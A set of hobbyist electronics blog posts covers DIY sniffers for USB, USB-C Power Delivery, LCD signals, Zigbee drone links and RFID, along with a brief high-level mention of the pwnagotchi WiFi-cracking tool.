D+ and D- wires from a USB cable connected to GPIO pins on the Pi Pico, using a female header plugged onto the jumper wires

Need A USB Sniffer? Use Your Pico!

Ever wanted to sniff USB device communications? The usual path was buying an expensive metal box with USB connectors, using logic analyzers, or wiring devboards together and hacking some software to make them forward USB data.

Now, thanks to [ataradov]’s work, you can simply use a Pi Pico – you only need to tap the D+ and D- pins, wire them to RP2040’s GPIOs, and you can sniff communication between your computer and any low-speed (1.5 Mbps) or full-speed (12 Mbps) devices. On the RP2040 side, plug the Pico into your computer, open the virtual serial port created, and witness the USB packets streaming in – for the price of a Pico, you get an elegant USB sniffer, only a little soldering required.

[ataradov] also offers us a complete board design with a RP2040 and a USB hub on it, equipped with USB sockets that completely free us from the soldering requirement; it’s an open-source KiCad design, so you can simply order some  sniffers made from your favourite fab! This project is a great learning tool, it’s as cheap and easy to make as humanly possible, and it has big potential for things like reverse-engineering old and new systems alike. Just couple this hack with another Pico doing USB device or host duty, maybe get up to date with USB reverse-engineering fundamentals, and you could make a Facedancer-like tool with ease.

Need to reach 480 Mbit/s? [ataradov] has a wonderful board for you as well, that we have covered last year – it’s well worth it if a device of yours can only do the highest speed USB2 can offer, and, it offers WireShark support. Want WireShark support and to use a Pico? Here’s a GitHub project by another hacker, [tana]. By now, merely having a Pi Pico gives you so many tools, it’s not even funny.

We thank [Julianna] for sharing this with us!

Freshening Up Google’s USB-C PD Sniffer

USB-C Power Delivery has definitely made the big mess of wires a bit smaller but not all cables are created equal — some of them can handle upwards of 100 W while the cheapest can handle only 10. To accommodate this, USB-C cables need to actively tell both ends what their capabilities are, which turns an otherwise passive device into a hidden chip in a passive looking cable.

[Greg Davill] has decided to unravel the mystery of why your laptop isn’t charging by creating a USB-PD sniffer. Based on Google’s Twinkie sniffer, the FreshTwinkie makes the design more accessible by reducing the number of layers in the PCB and replacing the BGA variant of the STM32 for a more DIY-friendly QFN version. Interestingly, this isn’t the first time we’ve seen somebody try and simplify the Twinkie; back in 2021, the Twonkie from from [dojoe] hit a number of similar notes.

USB-C Power Delivery is just one of many protocols spoken over the CC pins, and the FreshTwinkie might be able to detect when some of those are enabled and why or why not. With future development, it could potentially provide useful information as to why a Thunderbolt 4 or tunneled PCIe device isn’t working correctly.

Google-Inspired USB-PD Sniffer For The DIY Crowd

If you want to hack around with the communication protocol that USB Power Delivery devices use to negotiate their power requirements with the upstream source, a tool like Google’s Twinkie really helps. With it you can sniff data off the line, analyze it, and even inject your own packets. Luckily for us, the search giant made the device open source so we can all have one of our own.

Unfortunately, as [dojoe] found out, the Twinkie isn’t particularly well suited for small-scale hobbyist manufacturing. So he came up with a revised design he calls Twonkie that replaces the six layer PCB with a much more reasonable four layer version that can be manufactured cheaply by OSHPark, and swaps out the BGA components with QFP alternatives you can hand solder.

That said, it’s still likely to be a challenging build for the home gamer. There’s quite a few 0402 passives on there, and while those are doable with an iron, it can certainly be tricky. To take some pressure off, [dojoe] says he tried to optimize the board layout as much as possible for hand assembly. He was even able to avoid needing hot air by straddling the PCB with USB-C mounts intended for vertical applications.

Given the current chip shortage, [dojoe] says the biggest problem might actually getting your hands on the STM32F072CB microcontroller at the Twonkie’s core. To that end, the board supports TQFP44 and QFN44 footprints, and you can even use a STM32F072C8 at the cost of some functionality. With a bit of luck, hopefully you can find a chip that will work in the parts bin.

A Tamagotchi For WiFi Cracking

OK, let’s start this one by saying that it’s useful to know how to break security measures in order to understand how to better defend yourself, and that you shouldn’t break into any network you don’t have access to. That being said, if you want to learn about security and the weaknesses within the WPA standard, there’s no better way to do it than with a tool that mimics the behavior of a Tamagotchi.

Called the pwnagotchi, this package of artificial intelligence looks for information in local WiFi packets that can be used to crack WPA encryption. It’s able to modify itself in order to maximize the amount of useful information it’s able to obtain from whatever environment you happen to place it in. As an interesting design choice, the pwnagotchi behaves like an old Tamagotchi pet would, acting happy when it gets the inputs it needs.

This project is beyond a novelty though and goes deep in the weeds of network security. If you’re at all interested in the ways in which your own networks might be at risk, this might be a tool you can use to learn a little more about the ways of encryption, general security, and AI to boot. Of course, if you’re new to the network security world, make sure the networks you’re using are secured at least a little bit first.

Thanks to [Itay] for the tip!

The Bluetooth LCD Sniffer You Didn’t Know You Needed

At one time or another, we’ve all suffered through working with a piece of equipment that didn’t feature a way to export its data to another device. Whether it was just too old to offer such niceties, or the manufacturer locked the capability behind some upgrade, the pain of staring at digits ticking over on a glowing LCD display and wishing there was a practical way to scrape what our eyes were seeing is well known to hackers.

That was precisely the inspiration for DoMSnif, the dot matrix LCD sniffer that [Blecky] has been working on. Originally the project started as a way to record the temperature of his BRTRO-420 reflow oven, but realizing that such a device could have widespread appeal to other hardware hackers, he’s rightfully decided to enter it into the 2019 Hackaday Prize. If perfected, it could be an excellent way to bolt data capture capabilities to your older devices.

The first phase of this project was figuring out how to capture and parse the signals going into the device’s KS0108 LCD. Getting the data was certainly easy enough, he just had to hook a logic analyzer up between the display and the main board of the device. Of course, figuring out what it all means is a different story.

After running the oven for a bit with the analyzer recording, [Blecky] had more than enough data to get started on decoding it. Luckily, the layout of this fairly common 128×64 pixel display is well documented and easy enough to understand. With a little work, he was able to create a tool that would import the captured data and display it on a virtual LCD.

Unfortunately, the Bluetooth part is where things get tricky. Ultimately, [Blecky] wants to ditch the logic analyzer and use a Adafruit Feather nRF52 Bluefruit to capture the signals going to the LCD and pipe them to a waiting device over Bluetooth. But his testing has found that the nRF52’s radio is simply too slow. The display is receiving data every 14us, but it takes the radio at least 50us to send a packet.

[Blecky] is looking at ways around this problem, and we’re confident he’ll crack it. The solution could be in buffering and compressing the data before sending it out, though you’d lose the ability to monitor the display in real-time. Even if he has to abandon the Bluetooth aspect entirely and make the device wired, we still think there would be a market for an easy to use hardware and software solution for scraping LCD data.

Drone Gives Up Its Wireless Secrets To Zigbee Sniffer

There’s something thrilling about decoding an unknown communications protocol. You start with a few clues, poke at the problem with some simple tools, and eventually work your way up to that first breakthrough that lets you crack the code. It can be frustrating, but when you eventually win, it can be very rewarding.

It seems that [Jason] learned this while decoding the wireless conversation between his mass-market quad and its controller. The quad in question, a Yuneec Q500, is one of those mid-range, ready-to-fly drones that’s targeted at those looking to get in the air easily and take some cool pictures. Unsure how the drone and controller were talking, [Jason] popped the covers and found a Zigbee chipset within. With the help of a $14 Zigbee USB dongle and some packet sniffing software from TI, [Jason] was able to see packets flowing, but decoding them was laborious. Luckily, the sniffer app can be set up to stream packets to another device, so [Jason] wrote a program to receive and display packets. He used that to completely characterize each controller input and the data coming back from the drone. It’s a long and strange toolchain, but the upshot is that he’s now able to create KML in real time and track the drone on Google Earth as it flies. The video below shows the build and a few backyard test flights.

Congratulations to [Jason] for breaking the protocol and opening up drones like this for other hackers. If you’re interested in learning more about Zigbee sniffing, you can actually hack a few smarthome gadgets into useful sniffers.

Continue reading “Drone Gives Up Its Wireless Secrets To Zigbee Sniffer”

Sniffing RFID Readers With A Piece Of Paper

We feature plenty of printed projects here on Hackaday, though they tend to be of the three dimensional type thanks to the proliferation of affordable 3D printers. But in this case, [Milosch Meriac] has managed to put together a printable design that’s not only a very cool hack, but is made up of a scant two dimensions. His creation, which could perhaps be considered something of an interactive circuit diagram, allows anyone with a paper printer and a few passive components to make a functional low-frequency RFID sniffer.

[Milosch] tells us the goal of the project is to lower the barrier for experimenting with the RFID technology that’s increasingly part of our everyday lives. Rather than having to use something expensive and complicated such as an oscilloscope, experimenters can simply plug their DIY RFID sniffer into their computer’s line-in jack and explore the produced waveform with open source tools.

To create a paper RFID sniffer, you start by printing the image out on a thick piece of paper, like card stock. You then apply foil tape where indicated to serve as traces in this makeshift PCB, and start soldering on the components as described in the text. [Milosch] says the assembly procedure is so simple even a kid can do it, and the total cost of each assembled sniffer is literally pennies; making this an excellent project for schools or really any large group.

If you want to play it safe the sniffer can be connected to a USB sound card rather than your machine’s primary sound hardware, and still come in dirt cheap. [Milosch] stops short of explaining the software side of things in this particular project, but any tool which can use input from the sound card as a makeshift oscilloscope should be a good start.

In the past we’ve seen [Milosch] perform low frequency RFID sniffing through the sound card with the powerful baudline tool, but if you want a little more capable hardware, we can point you in the right direction.